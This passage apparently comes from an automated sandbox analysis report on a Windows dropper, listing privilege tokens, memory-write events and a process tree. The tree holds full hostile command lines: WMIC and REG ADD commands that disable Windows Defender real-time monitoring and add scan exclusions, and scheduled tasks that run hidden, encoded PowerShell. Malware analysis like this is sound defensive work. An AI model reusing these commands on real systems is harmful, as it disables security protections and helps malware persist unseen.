SeUndockPrivilege 1412 WMIC.exe Token: SeManageVolumePrivilege 1412 WMIC.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeAssignPrimaryTokenPrivilege 580 WMIC.exe Token: SeIncreaseQuotaPrivilege 580 WMIC.exe Token: SeSecurityPrivilege 580 WMIC.exe Token: SeTakeOwnershipPrivilege 580 WMIC.exe Token: SeLoadDriverPrivilege 580 WMIC.exe Token: SeSystemtimePrivilege 580 WMIC.exe Token: SeBackupPrivilege 580 WMIC.exe Token: SeRestorePrivilege 580 WMIC.exe Token: SeShutdownPrivilege 580 WMIC.exe Token: SeSystemEnvironmentPrivilege 580 WMIC.exe Token: SeUndockPrivilege 580 WMIC.exe Token: SeManageVolumePrivilege 580 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1760 wrote to memory of 2352 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 30 PID 1760 wrote to memory of 2352 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 30 PID 1760 wrote to memory of 2352 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 30 PID 1760 wrote to memory of 2352 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 30 PID 1760 wrote to memory of 2352 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 30 PID 1760 wrote to memory of 2352 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 30 PID 1760 wrote to memory of 2352 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 30 PID 2352 wrote to memory of 2712 2352 Install.exe 31 PID 2352 wrote to memory of 2712 2352 Install.exe 31 PID 2352 wrote to memory of 2712 2352 Install.exe 31 PID 2352 wrote to memory of 2712 2352 Install.exe 31 PID 2352 wrote to memory of 2712 2352 Install.exe 31 PID 2352 wrote to memory of 2712 2352 Install.exe 31 PID 2352 wrote to memory of 2712 2352 Install.exe 31 PID 2712 wrote to memory of 2548 2712 Install.exe 33 PID 2712 wrote to memory of 2548 2712 Install.exe 33 PID 2712 wrote to memory of 2548 2712 Install.exe 33 PID 2712 wrote to memory of 2548 2712 Install.exe 33 PID 2712 wrote to memory of 2548 2712 Install.exe 33 PID 2712 wrote to memory of 2548 2712 Install.exe 33 PID 2712 wrote to memory of 2548 2712 Install.exe 33 PID 2548 wrote to memory of 2604 2548 forfiles.exe 35 PID 2548 wrote to memory of 2604 2548 forfiles.exe 35 PID 2548 wrote to memory of 2604 2548 forfiles.exe 35 PID 2548 wrote to memory of 2604 2548 forfiles.exe 35 PID 2548 wrote to memory of 2604 2548 forfiles.exe 35 PID 2548 wrote to memory of 2604 2548 forfiles.exe 35 PID 2548 wrote to memory of 2604 2548 forfiles.exe 35 PID 2604 wrote to memory of 2628 2604 cmd.exe 36 PID 2604 wrote to memory of 2628 2604 cmd.exe 36 PID 2604 wrote to memory of 2628 2604 cmd.exe 36 PID 2604 wrote to memory of 2628 2604 cmd.exe 36 PID 2604 wrote to memory of 2628 2604 cmd.exe 36 PID 2604 wrote to memory of 2628 2604 cmd.exe 36 PID 2604 wrote to memory of 2628 2604 cmd.exe 36 PID 2628 wrote to memory of 1660 2628 powershell.exe 37 PID 2628 wrote to memory of 1660 2628 powershell.exe 37 PID 2628 wrote to memory of 1660 2628 powershell.exe 37 PID 2628 wrote to memory of 1660 2628 powershell.exe 37 PID 2628 wrote to memory of 1660 2628 powershell.exe 37 PID 2628 wrote to memory of 1660 2628 powershell.exe 37 PID 2628 wrote to memory of 1660 2628 powershell.exe 37 PID 2712 wrote to memory of 1148 2712 Install.exe 38 PID 2712 wrote to memory of 1148 2712 Install.exe 38 PID 2712 wrote to memory of 1148 2712 Install.exe 38 PID 2712 wrote to memory of 1148 2712 Install.exe 38 PID 2712 wrote to memory of 1148 2712 Install.exe 38 PID 2712 wrote to memory of 1148 2712 Install.exe 38 PID 2712 wrote to memory of 1148 2712 Install.exe 38 PID 2656 wrote to memory of 2840 2656 taskeng.exe 41 PID 2656 wrote to memory of 2840 2656 taskeng.exe 41 PID 2656 wrote to memory of 2840 2656 taskeng.exe 41 PID 2656 wrote to memory of 2840 2656 taskeng.exe 41 PID 2840 wrote to memory of 352 2840 jlvUgcu.exe 42 PID 2840 wrote to memory of 352 2840 jlvUgcu.exe 42 PID 2840 wrote to memory of 352 2840 jlvUgcu.exe 42 PID 2840 wrote to memory of 352 2840 jlvUgcu.exe 42 PID 2840 wrote to memory of 1116 2840 jlvUgcu.exe 44 PID 2840 wrote to memory of 1116 2840 jlvUgcu.exe 44 PID 2840 wrote to memory of 1116 2840 jlvUgcu.exe 44 PID 2840 wrote to memory of 1116 2840 jlvUgcu.exe 44 PID 596 wrote to memory of 580 596 taskeng.exe 47 PID 596 wrote to memory of 580 596 taskeng.exe 47 PID 596 wrote to memory of 580 596 taskeng.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe"C:\Users\Admin\AppData\Local\Temp\7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS41D1.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\7zS4441.tmp\Install.exe.\Install.exe /BdidFTzS "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bYIjjyXTgczhZAJGMW" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe\" om /UdidBEQ 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 6044⤵
- Loads dropped DLL
- Program crash
PID:1672
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DFB8EB59-A1DB-4ED2-A43E-1197300EBB0B} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exeC:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe om /UdidBEQ 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gddbOEtKo" /SC once /ST 04:16:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gddbOEtKo"3⤵PID:1116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gddbOEtKo"3⤵PID:2452
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:940
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1420
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWIwmfRNP" /SC once /ST 04:18:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWIwmfRNP"3⤵PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWIwmfRNP"3⤵PID:1620
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2320
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2700
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:323⤵PID:2916
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:643⤵PID:2688
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:323⤵PID:2560
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:324⤵PID:548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:643⤵PID:840
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:644⤵PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf"3⤵PID:3000
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2628 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:324⤵PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:644⤵PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:324⤵PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:644⤵PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:324⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:644⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:324⤵PID:836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:644⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:324⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:644⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:324⤵PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:644⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:324⤵PID:2516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:644⤵PID:1008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:324⤵PID:704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:644⤵PID:1728
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJqcGvoOz" /SC once /ST 01:01:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJqcGvoOz"3⤵PID:2600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJqcGvoOz"3⤵PID:344
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1240
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1988
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2632
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "akamOyUwOLVWEybrw" /SC once /ST 01:57:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe\" 0O /NqUMdidsP 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "akamOyUwOLVWEybrw"3⤵PID:1060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 3283⤵
- Loads dropped DLL
- Program crash
PID:1920
-
-
-
C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exeC:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe 0O /NqUMdidsP 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3060 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bYIjjyXTgczhZAJGMW"3⤵PID:2160
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1312
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1656
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056 -
